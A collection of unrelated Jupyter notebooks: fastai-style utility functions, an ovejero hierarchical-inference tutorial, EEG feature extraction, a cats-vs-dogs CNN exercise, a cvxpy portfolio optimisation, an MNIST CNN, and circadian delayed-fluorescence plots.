len(t)>len(t2) t[0] ``` You can also pass an optional `file_type` MIME prefix and/or a list of file extensions. ``` txt_files=path.ls(file_type='text') assert len(txt_files) > 0 and txt_files[0].suffix=='.py' ipy_files=path.ls(file_exts=['.ipynb']) assert len(ipy_files) > 0 and ipy_files[0].suffix=='.ipynb' txt_files[0],ipy_files[0] #hide pkl = pickle.dumps(path) p2 =pickle.loads(pkl) test_eq(path.ls()[0], p2.ls()[0]) #export def bunzip(fn): "bunzip `fn`, raising exception if output already exists" fn = Path(fn) assert fn.exists(), f"{fn} doesn't exist" out_fn = fn.with_suffix('') assert not out_fn.exists(), f"{out_fn} already exists" with bz2.BZ2File(fn, 'rb') as src, out_fn.open('wb') as dst: for d in iter(lambda: src.read(1024*1024), b''): dst.write(d) f = Path('files/test.txt') if f.exists(): f.unlink() bunzip('files/test.txt.bz2') t = f.open().readlines() test_eq(len(t),1) test_eq(t[0], 'test\n') f.unlink() #export def join_path_file(file, path, ext=''): "Return `path/file` if file is a string or a `Path`, file otherwise" if not isinstance(file, (str, Path)): return file path.mkdir(parents=True, exist_ok=True) return path/f'{file}{ext}' path = Path.cwd()/'_tmp'/'tst' f = join_path_file('tst.txt', path) assert path.exists() test_eq(f, path/'tst.txt') with open(f, 'w') as f_: assert join_path_file(f_, path) == f_ shutil.rmtree(Path.cwd()/'_tmp') ``` ## Sorting objects from before/after Transforms and callbacks will have run_after/run_before attributes, this function will sort them to respect those requirements (if it's possible). Also, sometimes we want a tranform/callback to be run at the end, but still be able to use run_after/run_before behaviors. For those, the function checks for a toward_end attribute (that needs to be True). ``` #export def _is_instance(f, gs): tst = [g if type(g) in [type, 'function'] else g.__class__ for g in gs] for g in tst: if isinstance(f, g) or f==g: return True return False def _is_first(f, gs): for o in L(getattr(f, 'run_after', None)): if _is_instance(o, gs): return False for g in gs: if _is_instance(f, L(getattr(g, 'run_before', None))): return False return True def sort_by_run(fs): end = L(fs).attrgot('toward_end') inp,res = L(fs)[~end] + L(fs)[end], L() while len(inp): for i,o in enumerate(inp): if _is_first(o, inp): res.append(inp.pop(i)) break else: raise Exception("Impossible to sort") return res class Tst(): pass class Tst1(): run_before=[Tst] class Tst2(): run_before=Tst run_after=Tst1 tsts = [Tst(), Tst1(), Tst2()] test_eq(sort_by_run(tsts), [tsts[1], tsts[2], tsts[0]]) Tst2.run_before,Tst2.run_after = Tst1,Tst test_fail(lambda: sort_by_run([Tst(), Tst1(), Tst2()])) def tst1(x): return x tst1.run_before = Tst test_eq(sort_by_run([tsts[0], tst1]), [tst1, tsts[0]]) class Tst1(): toward_end=True class Tst2(): toward_end=True run_before=Tst1 tsts = [Tst(), Tst1(), Tst2()] test_eq(sort_by_run(tsts), [tsts[0], tsts[2], tsts[1]]) ``` ## Image helpers ``` #export @delegates(plt.subplots, keep=True) def subplots(nrows=1, ncols=1, figsize=None, imsize=4, **kwargs): if figsize is None: figsize=(imsize*ncols,imsize*nrows) fig,ax = plt.subplots(nrows, ncols, figsize=figsize, **kwargs) if nrows*ncols==1: ax = array([ax]) return fig,ax #hide _,axs = subplots() test_eq(axs.shape,[1]) plt.close() _,axs = subplots(2,3) test_eq(axs.shape,[2,3]) plt.close() #export def show_image(im, ax=None, figsize=None, title=None, ctx=None, **kwargs): "Show a PIL or PyTorch image on `ax`." ax = ifnone(ax,ctx) if ax is None: _,ax = plt.subplots(figsize=figsize) # Handle pytorch axis order if hasattrs(im, ('data','cpu','permute')): im = im.data.cpu() if im.shape[0]<5: im=im.permute(1,2,0) elif not isinstance(im,np.ndarray): im=array(im) # Handle 1-channel images if im.shape[-1]==1: im=im[...,0] ax.imshow(im, **kwargs) if title is not None: ax.set_title(title) ax.axis('off') return ax ``` `show_image` can show PIL images... ``` im = Image.open(TEST_IMAGE_BW) ax = show_image(im, cmap="Greys", figsize=(2,2)) ``` ...and color images with standard `CHW` dim order... ``` im2 = np.array(Image.open(TEST_IMAGE)) ax = show_image(im2, figsize=(2,2)) ``` ...and color images with `HWC` dim order... ``` im3 = torch.as_tensor(im2).permute(2,0,1) ax = show_image(im3, figsize=(2,2)) #export def show_titled_image(o, **kwargs): "Call `show_image` destructuring `o` to `(img,title)`" show_image(o[0], title=str(o[1]), **kwargs) show_titled_image((im3,'A puppy'), figsize=(2,2)) #export @delegates(subplots) def show_images(ims, rows=1, titles=None, **kwargs): "Show all images `ims` as subplots with `rows` using `titles`" cols = int(math.ceil(len(ims)/rows)) if titles is None: titles = [None]*len(ims) axs = subplots(rows,cols,**kwargs)[1].flat for im,t,ax in zip(ims, titles, axs): show_image(im, ax=ax, title=t) show_images((im,im3), titles=('number','puppy'), imsize=2) ``` `ArrayImage`, `ArrayImageBW` and `ArrayMask` are subclasses of `ndarray` that know how to show themselves. ``` #export class ArrayBase(ndarray): def __new__(cls, x, *args, **kwargs): if isinstance(x,tuple): super().__new__(cls, x, *args, **kwargs) if args or kwargs: raise RuntimeError('Unknown array init args') if not isinstance(x,ndarray): x = array(x) return x.view(cls) #export class ArrayImageBase(ArrayBase): _show_args = {'cmap':'viridis'} def show(self, ctx=None, **kwargs): return show_image(self, ctx=ctx, **{**self._show_args, **kwargs}) #export class ArrayImage(ArrayImageBase): pass #export class ArrayImageBW(ArrayImage): _show_args = {'cmap':'Greys'} #export class ArrayMask(ArrayImageBase): _show_args = {'alpha':0.5, 'cmap':'tab20', 'interpolation':'nearest'} im = Image.open(TEST_IMAGE) im_t = ArrayImage(im) test_eq(type(im_t), ArrayImage) im_t2 = ArrayMask(1) test_eq(type(im_t2), ArrayMask) test_eq(im_t2, array(1)) ax = im_t.show(figsize=(2,2)) test_fig_exists(ax) ``` ## Other helpers ``` #export class PrettyString(str): "Little hack to get strings to show properly in Jupyter." def __repr__(self): return self #export def get_empty_df(n): "Return `n` empty rows of a dataframe" df = pd.DataFrame(index = range(n)) return [df.iloc[i] for i in range(n)] #export def display_df(df): "Display `df` in a notebook or defaults to print" try: from IPython.display import display, HTML except: return print(df) display(HTML(df.to_html())) #export def round_multiple(x, mult, round_down=False): "Round `x` to nearest multiple of `mult`" def _f(x_): return (int if round_down else round)(x_/mult)*mult res = L(x).map(_f) return res if is_listy(x) else res[0] test_eq(round_multiple(63,32), 64) test_eq(round_multiple(50,32), 64) test_eq(round_multiple(40,32), 32) test_eq(round_multiple( 0,32), 0) test_eq(round_multiple(63,32, round_down=True), 32) test_eq(round_multiple((63,40),32), (64,32)) #export def even_mults(start, stop, n): "Build log-stepped array from `start` to `stop` in `n` steps." if n==1: return stop mult = stop/start step = mult**(1/(n-1)) return np.array([start*(step**i) for i in range(n)]) test_eq(even_mults(2,8,3), [2,4,8]) test_eq(even_mults(2,32,5), [2,4,8,16,32]) test_eq(even_mults(2,8,1), 8) #export def num_cpus(): "Get number of cpus" try: return len(os.sched_getaffinity(0)) except AttributeError: return os.cpu_count() defaults.cpus = num_cpus() #export def add_props(f, n=2): "Create properties passing each of `range(n)` to f" return (property(partial(f,i)) for i in range(n)) class _T(): a,b = add_props(lambda i,x:i*2) t = _T() test_eq(t.a,0) test_eq(t.b,2) # export def change_attr(o, name, new_val): "Change the attr `name` in `o` with `new_val` if it exists and return the old value" old = getattr(o, name, None) if hasattr(o, 'name'): setattr(o, name, new_val) return o,old,hasattr(o, 'name') # export def change_attrs(o, names, new_vals, do=None): "Change the attr `names` in `o` with `new_vals` if it exists and return the old values" olds,has = L(),L() if do is None: do = L(True) * len(names) for n,v,d in zip(names, new_vals, do): if d: o,old,h = change_attr(o, n, v) olds.append(old); has.append(h) return o,olds,has ``` # Export - ``` #hide from nbdev.export import notebook2script notebook2script() ```
github_jupyter
``` import json import os, shutil from ovejero import model_trainer, hierarchical_inference from matplotlib import pyplot as plt from matplotlib.lines import Line2D import matplotlib def NOTIMPLEMENTED(): raise NotImplementedError('Must specify config/save path') ``` # Hierarchical Inference on a Test Set __Author:__ Sebastian Wagner-Carena __Last Run:__ 08/15/2020 __Goals:__ Learn how to run hierarchical inference on a test set using a trained BNN __Before running this notebook:__ Train a model and generate a test set on which you want to run hiearchical inference. To run hierarchical inference first we need to specify the path to the config files we'll use. There are three required configs for hierarchical inference: 1. The ovejero bnn config used for training/validation/testing 2. The ovejero distribution config that specifies the hyperparameters we'll run hierarchical inference over. For an example see the config in configs/baobab_configs/cent_narrow_cfg_prior.py. 3. The baobab config used to geneate the training set. You can also optionally specify the baobab config used to generate the test set. This will be used to plot the true values of the hyperparameters you're trying to infer. ``` # These are also optional, but these are the names of the hyperparameters and parameters of the lens sample. # They will only be used in plotting. hyperparam_plot_names = [r'$\mu_{\log(\gamma_\mathrm{ext})}$',r'$\sigma_{\log(\gamma_\mathrm{ext})}$', r'$\mu_x$',r'$\sigma_x$',r'$\mu_y$',r'$\sigma_y$', r'$\mu_{e1}$',r'$\sigma_{e1}$', r'$\mu_{e2}$',r'$\sigma_{e2}$', r'$\mu_{\log (\gamma_\mathrm{lens})}$',r'$\sigma_{\log (\gamma_\mathrm{lens})}$', r'$\mu_{\log (\theta_E)}$',r'$\sigma_{\log (\theta_E)}$'] param_plot_names = [r'$\gamma_\mathrm{ext}$', r'$\psi_\mathrm{ext}$',r'$x_\mathrm{lens}$', r'$y_\mathrm{lens}$',r'$e_1$',r'$e_2$',r'$\gamma_\mathrm{lens}$',r'$\theta_E$'] # The config path used to train the BNN bnn_config_path = NOTIMPLEMENTED() bnn_cfg = model_trainer.load_config(bnn_config_path) def recursive_str_checker(cfg_dict): for key in cfg_dict: if isinstance(cfg_dict[key],str): cfg_dict[key] = cfg_dict[key].replace('/home/swagnercarena/ovejero/',root_path) if isinstance(cfg_dict[key],dict): recursive_str_checker(cfg_dict[key]) recursive_str_checker(bnn_cfg) # The baobab config used to generate the training set. interim_baobab_omega_path = NOTIMPLEMENTED() # The ovejero distribution config specifying the hyperparameters you want to fit. target_ovejero_omega_path = NOTIMPLEMENTED() # Optional, but you can also specify the baobab config used to generate the test set. target_baobab_omega_path = NOTIMPLEMENTED() # The path to the test dataset test_dataset_path = '/Users/sebwagner/Documents/Grad_School/Research/Phil/ovejero/datasets/cent_narrow/' # NOTIMPLEMENTED() # The path to which the tf record will be saved test_dataset_tf_record_path = NOTIMPLEMENTED() # The number of walkers to use in the hierarchical inference. This should be AT LEAST double the number of # hyperparameters that are being inferred. n_walkers = 50 # If you've already generated the samples you can set this to True. If you do, the weights won't be # loaded, avoiding memory errors. lite_class = False # The HierarchicalClass will do all the heavy lifting of preparing the model from the configuration file, # initializing the test dataset, and providing outputs correctly marginalized over the BNN uncertainties. # To initialize it we need to pass in our config files hier_infer = hierarchical_inference.HierarchicalClass(bnn_cfg,interim_baobab_omega_path,target_ovejero_omega_path, test_dataset_path,test_dataset_tf_record_path, target_baobab_omega_path=target_baobab_omega_path, lite_class=lite_class) ``` After we've initialized our class, we need to generate bnn samples for the lenses in our test set. ``` # A path where the BNN samples will be saved save_path_samples = NOTIMPLEMENTED() # The number of BNN samples to draw per lens num_samples = 1000 # This command will generate the samples on the test set hier_infer.gen_samples(num_samples,save_path_samples) ``` Now we can run the hierarchical inference. We have to specify the number of walkers and the path to save the emcee samples to. We'll pick a specific path for the demo that we'll clear out later. ``` # Number of walkers n_walkers = 50 # The path to save the emcee samples to save_path_chains_hr = NOTIMPLEMENTED() # Initialize the sampler hier_infer.initialize_sampler(n_walkers,save_path_chains_hr) ``` Finally, we can run our hierarchical inference. For 100 steps this should take a few minutes (less when you have more cores) ``` # We can run the sampler for 100 steps. num_emcee_samples = 100 hier_infer.run_sampler(num_emcee_samples,progress=True) ``` 100 steps isn't enough for convergence, but we can still inspect the chains. The HierarchicalInference class allows us to plot the chains and to do some basic autocorrelation analysis. Neither plot should make you feel like things have converged in 100 steps. ``` burnin = 0 hier_infer.plot_chains(burnin=burnin,hyperparam_plot_names=hyperparam_plot_names) hier_infer.plot_auto_corr(hyperparam_plot_names=hyperparam_plot_names) ``` The class also allows us to inspect the results of the hierarchical inference and generate some nice plots. For an example check the hierarchical inference notebook in the papers folder. ``` # Delete the weights we generated. os.remove('demo_hier_samples.h5') shutil.rmtree('fow_model_bnn_samps') ```
github_jupyter
``` import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt w = np.load('w_windows.npy') n = np.load('n_windows.npy') from scipy.stats import skew, kurtosis from numba import jit fs = 256 jw = fs//.25 @jit(nopython=True) def energy(x): return np.sum(np.abs(x)**2) @jit(nopython=True) def mpp(x): return np.array([np.mean(x[:,i]) for i in range(len(x[0]))]) def curtose(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([kurtosis(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) def assimetria(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([skew(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) def variancia(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([np.var(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) def energia(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([energy(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) janela = lambda jfs,s:np.array([i*jfs for i in range(s//jfs+1)]) jc = janela(int(jw),len(w[0])) c = curtose(w,jc) a = assimetria(w,jc) v = variancia(w,jc) e = energia(w,jc) w_features = np.array([c,a,v,e]) w_features.shape jc = janela(int(jw),len(n[0])) c = curtose(n,jc) a = assimetria(n,jc) v = variancia(n,jc) e = energia(n,jc) n_features = np.array([c,a,v,e]) n_features.shape ``` ## Visualização de gráficos ``` col = ['Kurtosis','Skewness','Variance','Energy'] data = pd.DataFrame(np.hstack((w_features,n_features)).T,columns=col) y = np.hstack((np.repeat('Yes',w_features.shape[1]),np.repeat('No',w_features.shape[1]))) data['Class'] = y data.head() fig, ax = plt.subplots(2,2) sns.boxplot(x="Class", y="Kurtosis", hue="Class",data=data,ax=ax[0,0],showfliers=False) sns.boxplot(x="Class", y="Skewness", hue="Class",data=data,ax=ax[0,1],showfliers=False) sns.boxplot(x="Class", y="Variance", hue="Class",data=data,ax=ax[1,0],showfliers=False) sns.boxplot(x="Class", y="Energy", hue="Class",data=data,ax=ax[1,1],showfliers=False) fig, ax = plt.subplots(2,2) sns.violinplot(x="Class", y="Kurtosis", hue="Class",data=data,ax=ax[0,0]) sns.violinplot(x="Class", y="Skewness", hue="Class",data=data,ax=ax[0,1]) sns.violinplot(x="Class", y="Variance", hue="Class",data=data,ax=ax[1,0]) sns.violinplot(x="Class", y="Energy", hue="Class",data=data,ax=ax[1,1]) ```
github_jupyter
# Cats vs Dogs - Best Model ``` # In this exercise you will train a CNN on the FULL Cats-v-dogs dataset # This will require you doing a lot of data preprocessing because # the dataset isn't split into training and validation for you # This code block has all the required inputs import os import zipfile import random import tensorflow as tf from tensorflow.keras.optimizers import RMSprop from tensorflow.keras.preprocessing.image import ImageDataGenerator from shutil import copyfile !wget --no-check-certificate \ "https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip" \ -O "/tmp/cats-and-dogs.zip" local_zip = '/tmp/cats-and-dogs.zip' zip_ref = zipfile.ZipFile(local_zip, 'r') zip_ref.extractall('/tmp') zip_ref.close() print(len(os.listdir('/tmp/PetImages/Cat/'))) print(len(os.listdir('/tmp/PetImages/Dog/'))) # Expected Output: # 12501 # 12501 # Use os.mkdir to create your directories # You will need a directory for cats-v-dogs, and subdirectories for training # and testing. These in turn will need subdirectories for 'cats' and 'dogs' try: base_dir = '/tmp/cats-v-dogs' os.mkdir(base_dir) os.mkdir(os.path.join(base_dir,'training/')) os.mkdir(os.path.join(base_dir,'testing/')) os.mkdir(os.path.join(base_dir,'training/cats/')) os.mkdir(os.path.join(base_dir,'training/dogs/')) os.mkdir(os.path.join(base_dir,'testing/cats/')) os.mkdir(os.path.join(base_dir,'testing/dogs/')) except OSError: pass def split_data(SOURCE, TRAINING, TESTING, SPLIT_SIZE): img_temp = [img for img in os.listdir(SOURCE) if os.path.getsize(SOURCE+img)>0] img_temp = random.sample(img_temp,len(img_temp)) for f in img_temp[0:int(len(img_temp)*SPLIT_SIZE)]: copyfile(SOURCE+f, TRAINING+f) for f in img_temp[int(len(img_temp)*SPLIT_SIZE):]: copyfile(SOURCE+f, TESTING+f) CAT_SOURCE_DIR = "/tmp/PetImages/Cat/" TRAINING_CATS_DIR = "/tmp/cats-v-dogs/training/cats/" TESTING_CATS_DIR = "/tmp/cats-v-dogs/testing/cats/" DOG_SOURCE_DIR = "/tmp/PetImages/Dog/" TRAINING_DOGS_DIR = "/tmp/cats-v-dogs/training/dogs/" TESTING_DOGS_DIR = "/tmp/cats-v-dogs/testing/dogs/" split_size = .9 split_data(CAT_SOURCE_DIR, TRAINING_CATS_DIR, TESTING_CATS_DIR, split_size) split_data(DOG_SOURCE_DIR, TRAINING_DOGS_DIR, TESTING_DOGS_DIR, split_size) print(len(os.listdir('/tmp/cats-v-dogs/training/cats/'))) print(len(os.listdir('/tmp/cats-v-dogs/training/dogs/'))) print(len(os.listdir('/tmp/cats-v-dogs/testing/cats/'))) print(len(os.listdir('/tmp/cats-v-dogs/testing/dogs/'))) # Expected output: # 11250 # 11250 # 1250 # 1250 # DEFINE A KERAS MODEL TO CLASSIFY CATS V DOGS # USE AT LEAST 3 CONVOLUTION LAYERS model = tf.keras.models.Sequential([ tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150,150,3)), tf.keras.layers.MaxPooling2D(2,2), tf.keras.layers.Conv2D(32, (3, 3), activation='relu'), tf.keras.layers.MaxPooling2D(2,2), tf.keras.layers.Conv2D(64, (3, 3), activation='relu'), tf.keras.layers.MaxPooling2D(2,2), tf.keras.layers.Flatten(), tf.keras.layers.Dense(512, activation='relu'), tf.keras.layers.Dense(1, activation='sigmoid') ]) model.compile(optimizer=RMSprop(lr=0.001), loss='binary_crossentropy', metrics=['acc']) TRAINING_DIR = '/tmp/cats-v-dogs/training/' train_datagen = ImageDataGenerator(rescale=1./255.) # NOTE: YOU MUST USE A BATCH SIZE OF 10 (batch_size=10) FOR THE # TRAIN GENERATOR. train_generator = train_datagen.flow_from_directory(TRAINING_DIR, batch_size=10, class_mode='binary', target_size=(150,150)) VALIDATION_DIR = '/tmp/cats-v-dogs/testing' validation_datagen = ImageDataGenerator(rescale=1./255.) # NOTE: YOU MUST USE A BACTH SIZE OF 10 (batch_size=10) FOR THE # VALIDATION GENERATOR. validation_generator = validation_datagen.flow_from_directory(VALIDATION_DIR, batch_size=10, class_mode='binary', target_size=(150,150)) # Expected Output: # Found 22498 images belonging to 2 classes. # Found 2500 images belonging to 2 classes. history = model.fit(train_generator, epochs=15, verbose=1, validation_data=validation_generator) # The expectation here is that the model will train, and that accuracy will be > 95% on both training and validation # i.e. acc:A1 and val_acc:A2 will be visible, and both A1 and A2 will be > .9 # PLOT LOSS AND ACCURACY %matplotlib inline import matplotlib.image as mpimg import matplotlib.pyplot as plt #----------------------------------------------------------- # Retrieve a list of list results on training and test data # sets for each training epoch #----------------------------------------------------------- acc=history.history['acc'] val_acc=history.history['val_acc'] loss=history.history['loss'] val_loss=history.history['val_loss'] epochs=range(len(acc)) # Get number of epochs #------------------------------------------------ # Plot training and validation accuracy per epoch #------------------------------------------------ plt.plot(epochs, acc, 'r', "Training Accuracy") plt.plot(epochs, val_acc, 'b', "Validation Accuracy") plt.title('Training and validation accuracy') plt.figure() #------------------------------------------------ # Plot training and validation loss per epoch #------------------------------------------------ plt.plot(epochs, loss, 'r', "Training Loss") plt.plot(epochs, val_loss, 'b', "Validation Loss") plt.title('Training and validation loss') # Desired output. Charts with training and validation metrics. No crash :) ```
github_jupyter
# Portfolio Optimization using cvxpy ## Imports ``` import cvxpy as cvx import numpy as np import quiz_tests ``` ## Optimization with cvxpy http://www.cvxpy.org/ Practice using cvxpy to solve a simple optimization problem. Find the optimal weights on a two-asset portfolio given the variance of Stock A, the variance of Stock B, and the correlation between Stocks A and B. Create a function that takes in these values as arguments and returns the vector of optimal weights, i.e., $\mathbf{x} = \begin{bmatrix} x_A & x_B \end{bmatrix} $ Remember that the constraint in this problem is: $x_A + x_B = 1$ ## Hints ### standard deviation standard deviation $\sigma_A = \sqrt(\sigma^2_A)$, where $\sigma^2_A$ is variance of $x_A$ look at `np.sqrt()` ### covariance correlation between the stocks is $\rho_{A,B}$ covariance between the stocks is $\sigma_{A,B} = \sigma_A \times \sigma_B \times \rho_{A,B}$ ### x vector create a vector of 2 x variables $\mathbf{x} = \begin{bmatrix} x_A & x_B \end{bmatrix} $ we can use `cvx.Variable(2)` ### covariance matrix The covariance matrix $P = \begin{bmatrix} \sigma^2_A & \sigma_{A,B} \\ \sigma_{A,B} & \sigma^2_B \end{bmatrix}$ We can create a 2 x 2 matrix using a 2-dimensional numpy array `np.array([["Cindy", "Liz"],["Eddy", "Brok"]])` ### quadratic form We can write the portfolio variance $\sigma^2_p = \mathbf{x^T} \mathbf{P} \mathbf{x}$ Recall that the $\mathbf{x^T} \mathbf{P} \mathbf{x}$ is called the quadratic form. We can use the cvxpy function `quad_form(x,P)` to get the quadratic form. ### objective function Next, we want to define the objective function. In this case, we want to minimize something. What do we want to minimize in this case? We want to minimize the portfolio variance, which is defined by our quadratic form $\mathbf{x^T} \mathbf{P} \mathbf{x}$ We can find the objective function using cvxpy `objective = cvx.Minimize()`. Can you guess what to pass into this function? ### constraints We can also define our constraints in a list. For example, if you wanted the $\sum_{1}^{n}x = 1$, you could save a variable as `[sum(x)==1]`, where x was created using `cvx.Variable()`. ### optimization So now that we have our objective function and constraints, we can solve for the values of $\mathbf{x}$. cvxpy has the constructor `Problem(objective, constraints)`, which returns a `Problem` object. The `Problem` object has a function solve(), which returns the minimum of the solution. In this case, this is the minimum variance of the portfolio. It also updates the vector $\mathbf{x}$. We can check out the values of $x_A$ and $x_B$ that gave the minimum portfolio variance by using `x.value` ``` import cvxpy as cvx import numpy as np def optimize_twoasset_portfolio(varA, varB, rAB): """Create a function that takes in the variance of Stock A, the variance of Stock B, and the correlation between Stocks A and B as arguments and returns the vector of optimal weights Parameters ---------- varA : float The variance of Stock A. varB : float The variance of Stock B. rAB : float The correlation between Stocks A and B. Returns ------- x : np.ndarray A 2-element numpy ndarray containing the weights on Stocks A and B, [x_A, x_B], that minimize the portfolio variance. """ # TODO: Use cvxpy to determine the weights on the assets in a 2-asset # portfolio that minimize portfolio variance. stdA, stdB = np.sqrt(varA), np.sqrt(varB) cov = rAB * stdA * stdB x = cvx.Variable(2) P = np.array([[varA, cov], [cov, varB]]) objective = cvx.Minimize(cvx.quad_form(x, P)) constraints = [sum(x) == 1] problem = cvx.Problem(objective, constraints) result = problem.solve() min_value = problem.value xA,xB = x.value[0], x.value[1] return xA, xB quiz_tests.test_optimize_twoasset_portfolio(optimize_twoasset_portfolio) """Test run optimize_twoasset_portfolio().""" xA,xB = optimize_twoasset_portfolio(0.1, 0.05, 0.25) print("Weight on Stock A: {:.6f}".format(xA)) print("Weight on Stock B: {:.6f}".format(xB)) ```
github_jupyter
# MNIST DATA with Convolutional Neural Network ## 1. Import Packages ``` import input_data import numpy as np import matplotlib.pylab as plt import tensorflow as tf import keras from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten from keras.layers.convolutional import Conv2D, MaxPooling2D from keras.models import load_model import tensorflow.compat.v1 as tf tf.disable_v2_behavior() ``` ## 2. Explore MNIST Data ``` mnist_images = input_data.read_data_sets("./mnist_data", one_hot=False) # Example of a picture pic,real_values = mnist_images.train.next_batch(25) index = 11 # changeable with 0 ~ 24 integer image = pic[index,:] image = np.reshape(image,[28,28]) plt.imshow(image) plt.show() # Explore MNIST data plt.figure(figsize=(10,10)) for i in range(25): plt.subplot(5,5,i+1) plt.xticks([]) plt.yticks([]) plt.grid(False) image = np.reshape(pic[i,:] , [28,28]) plt.imshow(image) plt.xlabel(real_values[i]) plt.show() ``` ## 3. Make Dataset ``` # Download Data : http://yann.lecun.com/exdb/mnist/ # Data input script : https://github.com/tensorflow/tensorflow/tree/master/tensorflow/examples/tutorials/mnist mnist = input_data.read_data_sets("./samples/MNIST_data/", one_hot=True) print("the number of train examples :" , mnist.train.num_examples) print("the number of test examples :" , mnist.test.num_examples) x_train = mnist.train.images.reshape(55000, 28, 28, 1) x_test = mnist.test.images.reshape(10000, 28, 28, 1) y_train = mnist.train.labels y_test = mnist.test.labels ``` ## 4. Building my neural network in tensorflow ``` batch_size = 128 num_classes = 10 epochs = 50 model = Sequential() model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same', activation='relu', input_shape=(28,28,1))) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Conv2D(64, (5, 5), activation='relu', padding='same')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(1024, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(num_classes, activation='softmax')) model.summary() model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) hist = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test)) ``` ## 5. Calculate Accuracy ``` score1 = model.evaluate(x_train, y_train, verbose=0) score2 = model.evaluate(x_test, y_test, verbose=0) print('Train accuracy:', score1[1]) print('Test accuracy:', score2[1]) ``` ## 6. Check a prediction ``` predictions = model.predict(x_test) predictions[101] print(np.argmax(predictions[101])) # highest confidence # This model is convinced that this image is "1" plt.imshow(x_test[101].reshape(28,28)) ``` ## 7. Save model ``` # Save model model_json = model.to_json() with open("model.json", "w") as json_file : json_file.write(model_json) # Save model weights model.save_weights("model_weight.h5") print("Saved model to disk") # evaluate loaded_model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) train_score = loaded_model.evaluate(x_train, y_train, verbose=0) test_score = loaded_model.evaluate(x_test, y_test, verbose=0) print('training accuracy : ' + str(train_score[1])) print('test accuracy : ' + str(test_score[1])) ```
github_jupyter
``` import sys import os from glob import glob import random import numpy as np import pandas as pd from scipy import stats import matplotlib.pyplot as plt from matplotlib.colors import ListedColormap import seaborn as sns from openpyxl import load_workbook from sinaplot import sinaplot ## Default plotting params %matplotlib inline sns.set(font='Arial') plt.rcParams['svg.fonttype'] = 'none' style = sns.axes_style('white') style.update(sns.axes_style('ticks')) style['xtick.major.size'] = 2 style['ytick.major.size'] = 2 sns.set(font_scale=2, style=style) pal = sns.color_palette(['#0072b2', '#009e73', '#d55e00', '#f0e442', '#cc79a7']) cmap = ListedColormap(pal.as_hex()) sns.set_palette(pal) sns.palplot(pal) plt.show() exp1 = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='line graphs_01.04.15', header=1, usecols='B:CZ,DB', names=([f'WT_{i}' for i in range(49)] + [f'VIRc_{i}' for i in range(30)] + [f'vir-1_{i}' for i in range(24)] + ['hours']), ).set_index('hours') exp1.head() mean_df = pd.melt( exp1.reset_index(), id_vars=['hours'], var_name='replicate', value_name='delayed_fluorescence' ) mean_df['condition'] = mean_df.replicate.str.split('_', expand=True)[0] fig, ax = plt.subplots(figsize=(10, 5)) sns.lineplot( x='hours', y='delayed_fluorescence', hue='condition', hue_order=['WT', 'VIRc', 'vir-1'], data=mean_df, ax=ax, legend=False ) for i, label in enumerate(['WT', 'VIRc', 'vir-1']): ax.plot([], [], color=pal[i], label=label) ax.legend(loc=1, ncol=3) xticks = [0, 24, 48, 72, 94, 120, 144] ax.set_xticks(xticks) ax.set_xlim(0, 144) ax.set_xlabel('Time (hours)') ax.set_ylabel('Delayed\nFluorescence') plt.tight_layout() plt.savefig('vir1_VIRc_delayed_fluorescence_expt1.svg') plt.show() exp2 = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='line graphs_20.03.15', header=1, usecols='B:DK,DM', names=([f'WT_{i}' for i in range(61)] + [f'VIRc_{i}' for i in range(29)] + [f'vir-1_{i}' for i in range(24)] + ['hours']), ).set_index('hours') exp2.head() mean_df2 = pd.melt( exp2.reset_index(), id_vars=['hours'], var_name='replicate', value_name='delayed_fluorescence' ) mean_df2['condition'] = mean_df2.replicate.str.split('_', expand=True)[0] fig, ax = plt.subplots(figsize=(10, 5)) sns.lineplot( x='hours', y='delayed_fluorescence', hue='condition', hue_order=['WT', 'VIRc', 'vir-1'], data=mean_df2, ax=ax, legend=False ) for i, label in enumerate(['WT', 'VIRc', 'vir-1']): ax.plot([], [], color=pal[i], label=label) ax.legend(loc=1, ncol=3) xticks = [0, 24, 48, 72, 94, 120, 144] ax.set_xticks(xticks) ax.set_xlim(0, 144) ax.set_xlabel('Time (hours)') ax.set_ylabel('Delayed\nFluorescence') plt.tight_layout() plt.savefig('vir1_VIRc_delayed_fluorescence_expt2.svg') plt.show() exp1_period = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='RAE_plots_01.04.15', skiprows=2, header=None, usecols=[1, 2, 3], names=['condition', 'period', 'gof'] ) exp1_period['condition'] = exp1_period.condition.str.split(':', expand=True)[0].map( {'VIR': 'VIRc', 'vir1': 'vir-1', 'Wild Type': 'WT'}) exp1_period.head() fig, ax = plt.subplots(figsize=(5.5, 5)) sns.boxplot( x='condition', y='period', color='#eeeeee', data=exp1_period, fliersize=0, order=['WT', 'VIRc', 'vir-1'], ax=ax ) sns.stripplot( x='condition', y='period', data=exp1_period, order=['WT', 'VIRc', 'vir-1'], ax=ax, ) ax.set_ylabel('Period Length (hours)') ax.set_xlabel('') ax.set_ylim(22, 28) plt.tight_layout() plt.savefig('vir1_VIRc_period_length_expt1.svg') plt.show() exp2_period = pd.read_excel( './methylation_Summary_file.xlsx', 